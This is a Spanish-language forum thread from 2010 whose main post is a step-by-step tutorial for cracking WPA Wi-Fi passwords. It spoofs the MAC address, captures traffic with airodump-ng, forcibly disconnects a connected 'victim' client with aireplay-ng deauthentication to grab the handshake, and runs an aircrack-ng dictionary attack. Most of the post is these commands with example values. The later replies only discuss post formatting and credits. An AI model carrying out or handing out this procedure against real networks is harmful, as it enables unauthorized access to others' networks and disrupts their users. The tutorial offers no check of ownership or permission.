Usuario: Contraseña:
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Autor Tema: Hacking wpa A0 y diccionario. by lilo  (Leído 3861 veces)

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado ertito

  • Moderador Global
  • Trade Count: (0)
  • *****
  • Mensajes: 1187
  • Colaboraciones +61/-2
  • Sexo: Masculino
  • eterno aprendiz
    • LocosPorElWifi
Hacking wpa A0 y diccionario. by lilo
« en: 13 de Noviembre de 2010, 02:08:13 am »
Buenas.

Este Manual/tutorial hace ya un tiempo lo elabore para la antigua comunidad que teníamos.
El contenido de el es básico, y no solo una forma de hacerlo.

Bueno lo primero que debemos saber es, que esta encryptacion no necesita datas ni ivs. cuenta de un buen diccionario.

Primera entendamos un poco.
El diccionario lo podemos descargar, en el se encuentran palabras, millones de palabras. multiilenguajes. etc.

Cada uno de nosotros podemos armar un diccionario con todas las palabras que deseomos. Pero queda claro decir que no existe ningún diccionario con tu propia key/pass.
Tal diccionario no existe.

Ya que se basan en algoritmos.

También debemos tener en cuenta que debe de haber clientes conectados al (Access point/AP) de lo contrario no se podrá Generar el pakete que necesitamos donde se encuentra la key.

Esto no es necesario. Solo lo implemente.
Lo primero es. cambiar la dirección Mac de nuestra tarjeta.

Antes debemos dar de baja en interfase, Me basare en el mio Wlan0

Dar de baja interfase.
Código: [Seleccionar]
ifconfig interfase down
ejemplo.
Código: [Seleccionar]
ifconfig wlan0 down
Código: [Seleccionar]
macchanger -m 00:xx:xx:xx:xx:xx interfase
ejemplo.
Código: [Seleccionar]
macchanger -m 00:11:22:33:44:55 wlan0
nos aparecerá el cambio efectuado.

Reacción.




Echo esto ya tenemos nuestra Mac falsa.
Restablecemos el interfase con up
Código: [Seleccionar]
ifconfig interfase up
ejemplo.
Código: [Seleccionar]
ifconfig wlan0 up

Reacción.




Ahora a que ponerla en modo monitor, podemos hacerlo con airmon-ng o con este comando.
Código: [Seleccionar]
iwconfig interfase mode monitor
ejemplo.
Código: [Seleccionar]
iwconfig wlan0 mode monitor
Reacción.




Como vemos, no nos ah marcado error ni nada prosigamos.

Escanearemos canales en busca de redes.

ENC. WPA. 

Código: [Seleccionar]
airodump-ng interfase
ejemplo.
Código: [Seleccionar]
airodump-ng wlan0
Aclaro que use el termino víctima por que se familiariza al atake. No con la intención a terceras personas.

Reacción.



Una vez localizado el AP presionamos (control C) para detener la acción de la shell.
Tomamos en cuenta la Mac del AP y la Mac del cliente. Ambos BSSID'S

Capturamos trafico del canal con airodump-ng

Código: [Seleccionar]
airodump-ng --bssid Mac_ap -cCanal -w Nombre_del_fichero wlan0
-w Nombre_del_fichero Fichero donde se encuentra el Handshake.
El cual nombre handshake

ejemplo.
Código: [Seleccionar]
airodump-ng --bssid 00:14:95:xx:xx -c6 -w handshake wlan0
Reacción.



Como vemos en la imagen, de lado superior derecho no se ah obtenido aun el handshake,

Dejo de escribir sobre Handshake y mejor les explico que es.

Wikipedia.
http://en.wikipedia.org/wiki/Handshake

Wikipedia Traducido.
http://translate.google.com/translate?js=n&prev=_t&hl=es&ie=UTF-8&layout=2&eotf=1&sl=en&tl=es&u=http%3A%2F%2Fen.wikipedia.org%2Fwiki%2FHandshake

El Handshake es como un saludo un simple apreton de manos.

Para conseguirlo necesitamos que un cliente re-conecte al AP.

Des-auntentificar/Desconectar al cliente del ap AP, desconectarlo y cuando el cliente re-conecte. tendremos nuestro handshake.

Usamos aireplay-ng (-0 A0) (A0)

Código: [Seleccionar]
aireplay-ng -0 VARIANTE -a MAC_AP -c MAC_CLIENTE wlan0
ejemplo.
Código: [Seleccionar]
aireplay-ng -0 20 -a 00:14:95:xx:xx -c 00:0f:cb:xx:xx wlan0
Reacción.




Mientras tanto lo que paso en la pc de la victima. En el Cliente

El cliente Des-auntentificado



Bueno ya que obtuvimos el handshake.

Solo falta verificar si si lo tenemos. usaremos aircrack-ng para verificar

Código: [Seleccionar]
aircrack-ng /root/swireless/Nombre_del_fichero.capRecordar que el nombre del fichero fue el que asignamos con airodump

ejemplo.
Código: [Seleccionar]
aircrack-ng /root/swireless/handshake.cap

Reacción.




Como vemos todo a salido bien.

Ahora solo falta pasarle el Diccionario al handshake.

Aclaro: Como podemos ver a continuación, meti el diccionario en la carpeta wordlist
que se encuentra en la direccion.

/root/swireless/wordlist/diccionario.txt

Hay diccionarios de todo tipo de tamaños colores y sabores.

Imagino que el tamaño nos molesta en este caso y no podemos usar un diccionario de gran tamaño en live- cd. A si que podemos meterlo a un pendrive o tenerlo en alguna partición.

Para generar la ruta del diccionario solo basta con arrastrar dicho hacia la shell donde se invoque a -w

Código: [Seleccionar]
aircrack-ng /root/swireless/archivo.cap -w ruta_del_diccionario.txt
ejemplo me estoi basando en mi ruta, ustedes solo arrastren el diccionario y la ruta se generara automaticamente.
Código: [Seleccionar]
aircrack-ng /root/swireless/archivo.cap -w /root/swireless/wordlist/nombre_del_diccionario:txt
ejemplo.


Si nuestro algoritmo esta por debajo de los insectos. Encontraremos el password



Si no encuentran su password mentanlo al diccionario.... De momento es lo mas seguro. un buen algoritmo.

Un saludo.
lilo
« Última modificación: 13 de Noviembre de 2010, 09:55:54 am por ertito »

Desconectado lilo

  • Aprendamos Juntos.
  • Elite Friends
  • Trade Count: (0)
  • *****
  • Mensajes: 120
  • Colaboraciones +7/-1
  • Sexo: Masculino
  • NEWBIE
    • Mi humilde blog
Re:Hacking wpa A0 y diccionario.
« Respuesta #1 en: 13 de Noviembre de 2010, 07:24:51 am »
Buenas.

Ertito edite el post una pequeña manita de gato.

Un saludo.
lilo

Desconectado ertito

  • Moderador Global
  • Trade Count: (0)
  • *****
  • Mensajes: 1187
  • Colaboraciones +61/-2
  • Sexo: Masculino
  • eterno aprendiz
    • LocosPorElWifi
Re:Hacking wpa A0 y diccionario. by lilo
« Respuesta #2 en: 13 de Noviembre de 2010, 09:56:57 am »
ok lilo perfect.
se me olvido poner en el titulo by lilo, pero ya esta.
saludos comañero.

Desconectado lilo

  • Aprendamos Juntos.
  • Elite Friends
  • Trade Count: (0)
  • *****
  • Mensajes: 120
  • Colaboraciones +7/-1
  • Sexo: Masculino
  • NEWBIE
    • Mi humilde blog
Re:Hacking wpa A0 y diccionario. by lilo
« Respuesta #3 en: 13 de Noviembre de 2010, 08:55:44 pm »
Buenas.,

No era poner creditos. Dialectar y usar los bbcodes. Que tenemos.

BBcode. Codigo.

A que usar todas las herramientas que tenemos en el foro.

Un saludo.
lilo

Desconectado Manuel23009

  • Administrador
  • Trade Count: (0)
  • *****
  • Mensajes: 676
  • Colaboraciones +28/-0
  • Sexo: Masculino
  • Investigador
Re:Hacking wpa A0 y diccionario. by lilo
« Respuesta #4 en: 24 de Noviembre de 2010, 01:39:33 am »
Bien dicho LILO....yo ando esta noche por el foro buscando errores de formato y solucionando y poniendo unas chinchetas para que no se pierdan los temas importantes....
[img width= height=]http://img855.imageshack.us/img855/9742/cooltext572253739.png[/img]


Share me

Digg  Facebook  SlashDot  Delicious  Technorati  Twitter  Google  Yahoo
Smf

 

Dumpper All V.x.x

DUMPPER WPS PENTESTING